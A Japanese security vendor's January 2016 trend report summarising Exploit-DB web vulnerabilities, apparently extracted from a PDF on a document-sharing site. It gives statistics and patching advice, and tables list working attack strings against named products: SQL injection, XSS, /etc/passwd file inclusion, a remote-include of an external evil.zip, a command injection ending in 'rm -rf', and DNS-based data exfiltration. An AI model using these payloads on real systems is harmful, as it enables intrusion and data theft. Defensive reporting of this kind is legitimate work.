• 検索結果がありません。

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

N/A
N/A
Protected

Academic year: 2021

シェア "最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06"

Copied!
6
0
0

読み込み中.... (全文を見る)

全文

(1)
(2)

1. 脆弱性別件数

脆弱性カテゴリ 件数

ローカルファイル挿入

(Local File Inclusion:LFI) 1

コマンドインジェクション

(Command Injection) 1

コード・インジェクション

(Code Injection) 1

RFIリモートファイル挿入

(Remote File Inclusion:RFI) 2 クロス サイト スクリプティング

(Cross Site Scripting : XSS) 8 SQL インジェクション (SQL Injection) 15 合計 28 2. 危険度別件数 危険度 件数 割合 早急対応要 7 25% 高 21 75% 合計 28 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 2 7% 中 4 14% 易 22 79% 合計 28 100% 4. 主なソフトウェア別脆弱性発生件数 件数 4 4 4 3 2 2 2 2 2 2 1 28 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 サマリー ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム ソフトウェア名 合計

2016年1月に公開されたExploit-DBの分析の結果、SQL Injection攻撃に対する脆弱性報告数が最も多かったです。分析されたSQL Injection攻撃は、攻撃難易度の側面では単なる攻撃の成功可否を問 うクエリーを使用して攻撃が行われる難易度の低い攻撃が大半でしたが、危険度の側面ではともに高い攻撃でした。該当脆弱性が発見されたソフトウェアを使用する管理者は対象モジュール及びプラグインに入力値 検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを行い、SQL Injection攻撃に露出されないよう注意しなければなりません。SQL Injectionの他、最近になってCode Injectionと関連した脆弱 性が周期的に現れています。PHP Code Injectionは、SQL InjectionとCommand Injectionに比べ、相対的に危険度が低い脆弱性に属しますが、相変わらず多くのWebサイトがPHPで構成されていて、 PHP当該サイトはCode Injectionに簡単に露出される可能性があります。PHP Code InjectionもSQL Injectionと同じく、ユーザの入力値を厳しく検証して、悪意的なコードが実行されないよう注意しなければ

なりません。 PHPIPAM SevOne mcart Ramui webblog SeaWell Networks Open Audit Wordpress BK Mobile CMS Advanced Electron Forum

ProjectSend Simple PHP Polling System

1 1 1 2 8 15 0 2 4 6 8 10 12 14 16

脆弱性別件数

7 21

危険度別分類

早急対応要 高 2 4 22

攻撃実行の難易度別件数

難 中 易 4 4 4 3 2 2 2 2 2 2 1

主なソフトウェア別脆弱性発生件数

Open Audit ProjectSend Simple PHP Polling System Wordpress BK Mobile CMS Advanced Electron Forum PHPIPAM Ramui webblog SevOne mcart SeaWell Networks

(3)

2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 :情報漏洩    するため、高度な攻撃コードを採用したパターン、知らされていない攻撃    コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名    既知の攻撃コードを採用したパターンのいずれかに該当する :攻撃手法自体は難しくないが、迂回コードを採用したパターン 早急対応要:攻撃が成功した場合システムへ侵入可 :システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 危険度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 :1回のリクエストで攻撃が成立するパターン、複数回トライするも、 攻撃実行難易度分類基準

(4)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

2016-01-02 39150 SQL Injection 易 高

Open Audit

-software_add_license.php SQL Injection 脆弱性

/software_add_license.php?id=1%20and%201=1-- Open Audit Open Audit

2016-01-02 39150 SQL Injection 易 高

Open Audit -delete_system.php SQL Injection 脆弱性

/delete_system.php?pc=1%20and%201=1-- Open Audit Open Audit

2016-01-02 39150 SQL Injection 易 高

Open Audit

-list_viewdef_software_for_sys tem.php SQL Injection 脆弱性

/list_viewdef_software_for_system.php?pc=1%20and

%201=1-- Open Audit Open Audit

2015-01-02 39150 SQL Injection 易 高

Open Audit -system_export.php SQL Injection 脆弱性

/system_export.php?pc=1%20and%201=1-- Open Audit Open Audit

2016-01-05 39171 XSS 易 高 PHPIPAM 1.1.010

-loginCheck.php XSS 脆弱性

POST /phpipam/site/login/loginCheck.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ipamusername=<script>alert("RXSS01")</script>&ip ampassword=XXX PHPIPAM PHPIPAM 1.1.010 2016-01-05 39171 XSS 易 高 PHPIPAM 1.1.010 -loginCheck.php XSS 脆弱性 POST /phpipam/site/login/loginCheck.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ipamusername=<script>alert("RXSS01")</script>&ip ampassword=XXX PHPIPAM PHPIPAM 1.1.010 2016-01-05 39168 SQL Injection 易 高

Simple PHP Polling System -manage-profile.php SQL Injection 脆弱性

POST /manage-profile.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 email=1' and 1=1--Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 SQL Injection 易 高

Simple PHP Polling System -registeracc.php SQL Injection 脆弱性

POST /registeracc.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 email=tester%40wics.com' or updatexml(2,concat(0x7e,(version())),0) or' Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 XSS 易 高

Simple PHP Polling System -manage-profile.php XSS Injection 脆弱性

POST /manage-profile.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 firstname=WICS&lastname=wics&email=<script>alert (document.location)</script>&password=admin&Conf Simple PHP Polling System Simple PHP Polling System 2016-01-05 39168 XSS 易 高

Simple PHP Polling System -registeracc.php XSS Injection 脆弱性

POST /registeracc.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 firstname=WICS&lastname=wics&email=<script>alert (1);</script>&password=admin&ConfirmPassword=a Simple PHP Polling System Simple PHP Polling System 2016-01-08 39202 XSS 易 高

WP Symposium Pro Social Network Plugin 15.12 -wps_usermeta_shortcodes.ph p XSS 脆弱性

POST /wps_usermeta_shortcodes.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 wpspro_country="><script>alert("1")</script><" Wordpress WP Symposium Pro Social Network Plugin 15.12 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

(5)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-01-14 39234 Code Injection 易 高 SevOne NMS <= 5.3.6.0 -kill.php Code Injection 脆弱性

POST /doms/discoveryqueue/kill.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 pids[]=echo phpinfo(); SevOne SevOne NMS <=5.3.6.0 2016-01-14 39234 Command Injection 中 早急対応要 SevOne NMS <= 5.3.6.0 -kill.php Command Injection 脆 弱性

POST /doms/discoveryqueue/kill.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf SevOne SevOne NMS <= 5.3.6.0 2016-01-15 39246 SQL Injection 難 早急対応要

mcart.xls Bitrix Module 6.5.2 -mcart_xls_import.php SQL Injection 脆弱性 /bitrix/admin/mcart_xls_import.php?del_prof_real=1& xls_profile=%27%20OR%201=(select%20load_file(C ONCAT(CHAR(92),CHAR(92),(select%20version()),CH AR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),C HAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46 ),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR( 102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CH AR(114))))+--+

mcart mcart.xls Bitrix Module 6.5.2

2016-01-15 39246 SQL Injection 難 早急対応要

mcart.xls Bitrix Module 6.5.2 -mcart_xls_import_step_2.php SQL Injection 脆弱性 /admin/mcart_xls_import_step_2.php?save_profile=Y &make_translit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0 ,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92), (select%20version()),CHAR(46),CHAR(97),CHAR(116) ,CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(1 01),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHA R(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111), CHAR(98),CHAR(97),CHAR(114))))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRo w=0&titleRow=0&firstColumn=0&highestColumn=0& XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code= 1&xls_iblock_section_id_new=0

mcart mcart.xls Bitrix Module 6.5.2

2016-01-18 39266 LFI 易 早急対応要

SeaWell Networks Spectrum -configure_manage.php LFI 脆 弱性 /configure_manage.php?action=download_config&file =../../../../../../../../../etc/passwd SeaWell Networks SeaWell Networks Spectrum

2016-01-18 39263 RFI 易 高 Advanced Electron Forum

1.0.9 - index.php RFI 脆弱性 POST

/index.php?act=admin&adact=skin&seadact=import HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 folderpath=../&importtype=2&weburl=http://hyp3rlin x.altervista.org/evil.zip&filepath=../&uploadtheme=&i mportskin=Import Advanced Electron Forum Advanced Electron Forum 1.0.9

2016-01-18 39262 XSS 易 高 Advanced Electron Forum

1.0.9 - index.php XSS 脆弱性 POST

/index.php?act=admin&adact=skin&seadact=import HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fredirect="/><script>alert("XSS Advanced Electron Forum Advanced Electron Forum 1.0.9 2016-01-25 39309 SQL Injection 中 早急対応要

Wordpress Booking Calendar Contact Form Plugin <=1.1.23

/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_check_IPN_veri Wordpress Wordpress Booking Calendar

(6)

日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 2016.01.01~2016.01.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-01-27 39342 XSS 易 高

WordPress Booking Calendar Contact Form <=1.1.24 -admin.php XSS 脆弱性 /wp-admin/admin.php?page=cpabc_appointments&ac=st& chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert %281%29%3E&ics=%22%3E%3Cimg+src%3Dx+one rror%3Dalert%281%29%3E&scr=1 Wordpress WordPress Booking Calendar Contact Form <=1.1.24 2016-01-27 39339 SQL Injection 中 早急対応要 BK Mobile jQuery CMS 2.4 -gallery1.php SQL Injection 脆 弱性 /user/gallery1.php?g_name=1%27%20union%20all% 20select%201,2,3,group_concat%28version%28%29 %29,5--+ BK Mobile CMS BK Mobile jQuery CMS 2.4 2016-01-27 39339 XSS 易 高 BK Mobile jQuery CMS 2.4 -gallery1.php XSS 脆弱性 /user/gallery1.php?g_name=%3Cscript%3Ealert%28 %22XSS%22%29%3C/script%3E BK Mobile CMS BK Mobile jQuery CMS 2.4 2016-01-28 39355 RFI 易 高

Ramui Web Hosting Directory Script 4.0 - connection.php RFI 脆弱性 /gb/include/connection.php?root=http://test.com.inde x.php Ramui webblog Ramui Web Hosting Directory Script 4.0

2016-01-28 39354 SQL Injection 易 高 Ramui Forum Script 9.0

-page.php SQL Injection 脆弱性

/gb/include/page.php?pagename=1%20and%201=1-- Ramui webblog

Ramui Forum Script 9.0

2016-01-29 39385 SQL Injection 中 早急対応要 ProjectSend r582 -

manage-files.php SQL Injection 脆弱性

POST /manage-files.php?client_id=1 HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

status=10' and 0 union select 0,1 ,'0) or 1 union select

ProjectSend ProjectSend r582

2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 - clients.php

SQL Injection 脆弱性

POST /clients.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 status=1' and 1=1--ProjectSend ProjectSend r582 2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 - rocess-zip-download.php SQL Injection 脆弱性 /rocess-zip-download.php?file=1%27%20and%201=1--%20 ProjectSend ProjectSend r582

2016-01-29 39385 SQL Injection 易 高 ProjectSend r582 -

home-log.php SQL Injection 脆弱性 /home-log.php?action=1%27%20and%201=1--%20 ProjectSend

ProjectSend r582

参照

関連したドキュメント

テキストマイニング は,大量の構 造化されていないテキスト情報を様々な観点から

区分 項目 内容 公開方法等 公開情報 地内基幹送電線に関する情報

当社は、お客様が本サイトを通じて取得された個人情報(個人情報とは、個人に関する情報

製品開発者は、 JPCERT/CC から脆弱性関連情報を受け取ったら、ソフトウエア 製品への影響を調査し、脆弱性検証を行い、その結果を

※ログイン後最初に表示 される申込メニュー画面 の「ユーザ情報変更」ボタ ンより事前にメールアド レスをご登録いただきま

「系統情報の公開」に関する留意事項

Oracle WebLogic Server の脆弱性 CVE-2019-2725 に関する注 意喚起 ISC BIND 9 に対する複数の脆弱性に関する注意喚起 Confluence Server および Confluence

2 学校法人は、前項の書類及び第三十七条第三項第三号の監査報告書(第六十六条第四号において「財